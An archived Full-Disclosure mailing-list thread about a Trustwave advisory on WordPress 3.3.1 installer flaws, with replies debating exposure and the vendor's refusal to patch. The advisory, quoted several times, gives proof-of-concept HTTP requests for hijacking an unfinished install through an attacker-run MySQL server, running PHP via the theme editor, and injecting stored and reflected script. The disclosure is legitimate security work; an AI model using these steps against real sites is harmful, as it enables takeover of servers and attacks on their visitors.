subject:"\[Full\-disclosure\] TWSL2012\-002\: Multiple Vulnerabilities in WordPress"

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-26 Thread Henri Salo

On Wed, Jan 25, 2012 at 04:13:12PM +, Benji wrote:
> Yes it does.
> 
> wp-admin/setup-config.php?step=1 on any wp install where it exists gives
> this:
> 
> The file 'wp-config.php' already exists one level above your WordPress
> installation. If you need to reset any of the configuration items in this
> file, please delete it first.

Yes this is correct information at least with new versions of WordPress. We are 
running pretty big Linux-server in our organization and I can tell you that 
open "install me" -pages are very common and I see these as problem.

I can try to find out what went wrong with the installation or did they remove 
the WordPress-installation and didn't understand to remove everything included. 
I really hope to see this patched anyways just to be sure. I don't know what 
the actual impact in user-experience can be. Could WordPress comment?

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Julius Kivimäki

Funny but no, this does not need a non-installed wordpress.

2012/1/25 Benji 

> Dear full-disclosure
>
> I wrote to you to tell you about serious serious vulnerability in all
> Windows versions.
>
> If you turn machine on before system is configured, then you be able to
> set user password yourself, big gaping hole
>
> I make big large botnet to fully utilise this impressive vulnerability!
> thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i
> say nay though! Big time russian mobster offer me diamond, i say nay! I
> like report vuln of this size responsibility in so hope to make more
> money^H^H^H^H^H^H^Hsecure world.
>
> Please full-disclosure, this vuln is serious and i plead you shut down all
> windows now.
>
> I wrote metasploit module! It find new installs turned off machine, WOL
> and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many
> wifes!
>
>
>
>
> On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown  wrote:
>
>> On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:
>>
>> > There is A LOT of these open installation pages in the Internet. It is
>> not
>> > uncommon to leave those open by accident. Some people also do this,
>> > because they just don't understand the risks. I am wondering if
>> WordPress
>> > would apply patch if we create one as a collaborative effort. I would be
>> > more than happy to help creating a patch for this if this is the case.
>>
>> I may have missed something, but does simply having the file exposed make
>> you
>> vulnerable.  From looking at it, it starts of with a bunch of
>> file_exists(),
>> which essentially evaluate if you've installed or not and wp_die() if you
>> have.
>>
>> Tim
>> --
>> Tim Brown
>> 
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Benji

Yes it does.

wp-admin/setup-config.php?step=1 on any wp install where it exists gives
this:

The file 'wp-config.php' already exists one level above your WordPress
installation. If you need to reset any of the configuration items in this
file, please delete it first.


On Wed, Jan 25, 2012 at 4:11 PM, Julius Kivimäki
wrote:

> Funny but no, this does not need a non-installed wordpress.
>
>
> 2012/1/25 Benji 
>
>> Dear full-disclosure
>>
>> I wrote to you to tell you about serious serious vulnerability in all
>> Windows versions.
>>
>> If you turn machine on before system is configured, then you be able to
>> set user password yourself, big gaping hole
>>
>> I make big large botnet to fully utilise this impressive vulnerability!
>> thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i
>> say nay though! Big time russian mobster offer me diamond, i say nay! I
>> like report vuln of this size responsibility in so hope to make more
>> money^H^H^H^H^H^H^Hsecure world.
>>
>> Please full-disclosure, this vuln is serious and i plead you shut down
>> all windows now.
>>
>> I wrote metasploit module! It find new installs turned off machine, WOL
>> and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many
>> wifes!
>>
>>
>>
>>
>> On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown  wrote:
>>
>>> On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:
>>>
>>> > There is A LOT of these open installation pages in the Internet. It is
>>> not
>>> > uncommon to leave those open by accident. Some people also do this,
>>> > because they just don't understand the risks. I am wondering if
>>> WordPress
>>> > would apply patch if we create one as a collaborative effort. I would
>>> be
>>> > more than happy to help creating a patch for this if this is the case.
>>>
>>> I may have missed something, but does simply having the file exposed
>>> make you
>>> vulnerable.  From looking at it, it starts of with a bunch of
>>> file_exists(),
>>> which essentially evaluate if you've installed or not and wp_die() if you
>>> have.
>>>
>>> Tim
>>> --
>>> Tim Brown
>>> 
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Benji

Dear full-disclosure

I wrote to you to tell you about serious serious vulnerability in all
Windows versions.

If you turn machine on before system is configured, then you be able to set
user password yourself, big gaping hole

I make big large botnet to fully utilise this impressive vulnerability!
thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i
say nay though! Big time russian mobster offer me diamond, i say nay! I
like report vuln of this size responsibility in so hope to make more
money^H^H^H^H^H^H^Hsecure world.

Please full-disclosure, this vuln is serious and i plead you shut down all
windows now.

I wrote metasploit module! It find new installs turned off machine, WOL and
i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many
wifes!

On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown  wrote:

> On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:
>
> > There is A LOT of these open installation pages in the Internet. It is
> not
> > uncommon to leave those open by accident. Some people also do this,
> > because they just don't understand the risks. I am wondering if WordPress
> > would apply patch if we create one as a collaborative effort. I would be
> > more than happy to help creating a patch for this if this is the case.
>
> I may have missed something, but does simply having the file exposed make
> you
> vulnerable.  From looking at it, it starts of with a bunch of
> file_exists(),
> which essentially evaluate if you've installed or not and wp_die() if you
> have.
>
> Tim
> --
> Tim Brown
> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Tim Brown

On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:

> There is A LOT of these open installation pages in the Internet. It is not
> uncommon to leave those open by accident. Some people also do this,
> because they just don't understand the risks. I am wondering if WordPress
> would apply patch if we create one as a collaborative effort. I would be
> more than happy to help creating a patch for this if this is the case.

I may have missed something, but does simply having the file exposed make you 
vulnerable.  From looking at it, it starts of with a bunch of file_exists(), 
which essentially evaluate if you've installed or not and wp_die() if you 
have.

Tim
-- 
Tim Brown

signature.asc
Description: This is a digitally signed message part.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Henri Salo

On Wed, Jan 25, 2012 at 08:43:34AM -0600, Trustwave Advisories wrote:
> The vendor was notified. They have chosen not to fix the issue at this time. 
> The Vendor Response section has the details:
> 
> Vendor Response:
> Due to the fact that the component in question is an installation script,
> the vendor has stated that the attack surface is too small to warrant
> a fix:
> 
> "We give priority to a better user experience at the install process. It is
> unlikely a user would go to the trouble of installing a copy of WordPress
> and then not finishing the setup process more-or-less immediately. The
> window of opportunity for exploiting such a vulnerability is very small."
> 
> However, Trustwave SpiderLabs urges caution in situations where the
> WordPress installation script is provided as part of a default image.
> This is  often done as a convenience on hosting providers, even in
> cases where the client does not use the software. It is a best practice
> to ensure  that no installation scripts are exposed to outsiders, and
> these vulnerabilities reinforce the importance of this step.

There is A LOT of these open installation pages in the Internet. It is not 
uncommon to leave those open by accident. Some people also do this, because 
they just don't understand the risks. I am wondering if WordPress would apply 
patch if we create one as a collaborative effort. I would be more than happy to 
help creating a patch for this if this is the case.

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Trustwave Advisories

The vendor was notified. They have chosen not to fix the issue at this time. 
The Vendor Response section has the details:

Vendor Response:
Due to the fact that the component in question is an installation script,
the vendor has stated that the attack surface is too small to warrant
a fix:

"We give priority to a better user experience at the install process. It is
unlikely a user would go to the trouble of installing a copy of WordPress
and then not finishing the setup process more-or-less immediately. The
window of opportunity for exploiting such a vulnerability is very small."

However, Trustwave SpiderLabs urges caution in situations where the
WordPress installation script is provided as part of a default image.
This is  often done as a convenience on hosting providers, even in
cases where the client does not use the software. It is a best practice
to ensure  that no installation scripts are exposed to outsiders, and
these vulnerabilities reinforce the importance of this step.

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Henri Salo
Sent: Tuesday, January 24, 2012 5:48 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in 
WordPress

On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote:
> Trustwave's SpiderLabs Security Advisory TWSL2012-002:
> Multiple Vulnerabilities in WordPress
>
> https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
>
> Published: 1/24/12
> Version: 1.0
>
> Vendor: WordPress (http://wordpress.org/)
> Product: WordPress
> Version affected: 3.3.1 and prior
>
> Product description:
> WordPress is a free and open source blogging tool and publishing
> platform powered by PHP and MySQL.
>
> Credit: Jonathan Claudius of Trustwave SpiderLabs
>
> Finding 1: PHP Code Execution and Persistent Cross Site Scripting
> Vulnerabilities via 'setup-config.php' page.
> CVE: CVE-2011-4899
>
> The WordPress 'setup-config.php' installation page allows users to
> install WordPress in local or remote MySQL databases. This typically
> requires a user to have valid MySQL credentials to complete.  However,
> a malicious user can host their own MySQL database server and can
> successfully complete the WordPress installation without having valid 
> credentials on the target system.
>
> After the successful installation of WordPress, a malicious user can
> inject malicious PHP code via the WordPress Themes editor.  In
> addition, with control of the database store, malicious Javascript can
> be injected into the content of WordPress yielding persistent Cross Site 
> Scripting.
>
> Proof of Concept:
>
> Servers Involved
>
> A.B.C.D = Target WordPress Web Server
> W.X.Y.Z = Malicious User's MySQL Instance
>
> 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port
> 3306
>
> 2.) Performs POST/GET Requests to Install WordPress into MySQL
> Instance
>
> Request #1
> --
> POST /wp-admin/setup-config.php?step=2 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
> Gecko/20100101 Firefox/8.0.1
> Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
> Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 81
>
> dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&sub
> mit=Submit
>
> Request #2
> --
> GET /wp-admin/install.php HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
> Gecko/20100101 Firefox/8.0.1
> Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
> Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
> If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
>
> 3.) Get PHP Code Execution
>
> Malicious user edits 404.php via Themes Editor as follows:
>
>  phpinfo();
> ?>
>
> Note #1: Any php file in the theme could be used.
> Note #2: Depending settings, PHP may be used to execute system commands
>  on webserver.
>
> Malicious user performs get request of modified page to execute code.
>
> Request
> ---
> GET /w

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-24 Thread Henri Salo

On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote:
> Trustwave's SpiderLabs Security Advisory TWSL2012-002:
> Multiple Vulnerabilities in WordPress
> 
> https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
> 
> Published: 1/24/12
> Version: 1.0
> 
> Vendor: WordPress (http://wordpress.org/)
> Product: WordPress
> Version affected: 3.3.1 and prior
> 
> Product description:
> WordPress is a free and open source blogging tool and publishing platform
> powered by PHP and MySQL.
> 
> Credit: Jonathan Claudius of Trustwave SpiderLabs
> 
> Finding 1: PHP Code Execution and Persistent Cross Site Scripting
> Vulnerabilities via 'setup-config.php' page.
> CVE: CVE-2011-4899
> 
> The WordPress 'setup-config.php' installation page allows users to install
> WordPress in local or remote MySQL databases. This typically requires a user
> to have valid MySQL credentials to complete.  However, a malicious user can
> host their own MySQL database server and can successfully complete the
> WordPress installation without having valid credentials on the target system.
> 
> After the successful installation of WordPress, a malicious user can inject
> malicious PHP code via the WordPress Themes editor.  In addition, with control
> of the database store, malicious Javascript can be injected into the content
> of WordPress yielding persistent Cross Site Scripting.
> 
> Proof of Concept:
> 
> Servers Involved
> 
> A.B.C.D = Target WordPress Web Server
> W.X.Y.Z = Malicious User's MySQL Instance
> 
> 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306
> 
> 2.) Performs POST/GET Requests to Install WordPress into MySQL Instance
> 
> Request #1
> --
> POST /wp-admin/setup-config.php?step=2 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
> Gecko/20100101 Firefox/8.0.1
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
> Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 81
> 
> dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit
> 
> Request #2
> --
> GET /wp-admin/install.php HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
> Gecko/20100101 Firefox/8.0.1
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
> Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
> If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
> 
> 3.) Get PHP Code Execution
> 
> Malicious user edits 404.php via Themes Editor as follows:
> 
>  phpinfo();
> ?>
> 
> Note #1: Any php file in the theme could be used.
> Note #2: Depending settings, PHP may be used to execute system commands
>  on webserver.
> 
> Malicious user performs get request of modified page to execute code.
> 
> Request
> ---
> GET /wp-content/themes/default/404.php HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
> Gecko/20100101 Firefox/8.0.1
> 
> 4.) Get Persistent Cross Site Scripting
> 
> Malicious User Injects Malicious Javascript into their own MySQL database 
> instance
> 
> MySQL Query
> ---
> update wp_comments SET
> comment_content='alert('123')' where comment_content='Hi,
> this is a comment.To delete \ a comment, just log in and view the
> post's comments. There you will have the option to edit or delete
> them.';
> 
> Non-malicious User Visits Wordpress installation and has Javascript executed 
> on their browser
> 
> Request
> ---
> GET /?p=1 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
> Gecko/20100101 Firefox/8.0.1
> 
> 
> 
> Finding 2: Multiple Cross Site Scripting Vulnerabilities in
> 'setup-config.php' page
> CVE: CVE-2012-0782
> 
> The WordPress 'setup-config.php' installation page allows users to install
> WordPress in local or remote MySQL databases. When using this installation 
> page
> the user is asked to supply the database name, the server that the database
> resides on, and a valid MySQL username and password.
> 
> During this process, malicious users can supply javascript within
> the "dbname", "dbhost" or "uname" parameters. Upon clicking the submission
> button, the javascript is rendered in the client's browser.
> 
> Proof of Concept:
> 
> Servers Involved
> 
> A.B.C.D = Target WordPress Web Server
> 
> Request
> ---
> POST /wp-admin/setup-config.php?step=2 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac

[Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-24 Thread Trustwave Advisories

Trustwave's SpiderLabs Security Advisory TWSL2012-002:
Multiple Vulnerabilities in WordPress

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt

Published: 1/24/12
Version: 1.0

Vendor: WordPress (http://wordpress.org/)
Product: WordPress
Version affected: 3.3.1 and prior

Product description:
WordPress is a free and open source blogging tool and publishing platform
powered by PHP and MySQL.

Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: PHP Code Execution and Persistent Cross Site Scripting
Vulnerabilities via 'setup-config.php' page.
CVE: CVE-2011-4899

The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. This typically requires a user
to have valid MySQL credentials to complete.  However, a malicious user can
host their own MySQL database server and can successfully complete the
WordPress installation without having valid credentials on the target system.

After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor.  In addition, with control
of the database store, malicious Javascript can be injected into the content
of WordPress yielding persistent Cross Site Scripting.

Proof of Concept:

Servers Involved

A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance

1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306

2.) Performs POST/GET Requests to Install WordPress into MySQL Instance

Request #1
--
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit

Request #2
--
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT

3.) Get PHP Code Execution

Malicious user edits 404.php via Themes Editor as follows:



Note #1: Any php file in the theme could be used.
Note #2: Depending settings, PHP may be used to execute system commands
 on webserver.

Malicious user performs get request of modified page to execute code.

Request
---
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1

4.) Get Persistent Cross Site Scripting

Malicious User Injects Malicious Javascript into their own MySQL database 
instance

MySQL Query
---
update wp_comments SET
comment_content='alert('123')' where comment_content='Hi,
this is a comment.To delete \ a comment, just log in and view the
post's comments. There you will have the option to edit or delete
them.';

Non-malicious User Visits Wordpress installation and has Javascript executed on 
their browser

Request
---
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1



Finding 2: Multiple Cross Site Scripting Vulnerabilities in
'setup-config.php' page
CVE: CVE-2012-0782

The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. When using this installation page
the user is asked to supply the database name, the server that the database
resides on, and a valid MySQL username and password.

During this process, malicious users can supply javascript within
the "dbname", "dbhost" or "uname" parameters. Upon clicking the submission
button, the javascript is rendered in the client's browser.

Proof of Concept:

Servers Involved

A.B.C.D = Target WordPress Web Server

Request
---
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: application/x-www-form-urlencoded
Content-Len

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

[Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

9 matches

Site Navigation

Mail list logo

Footer information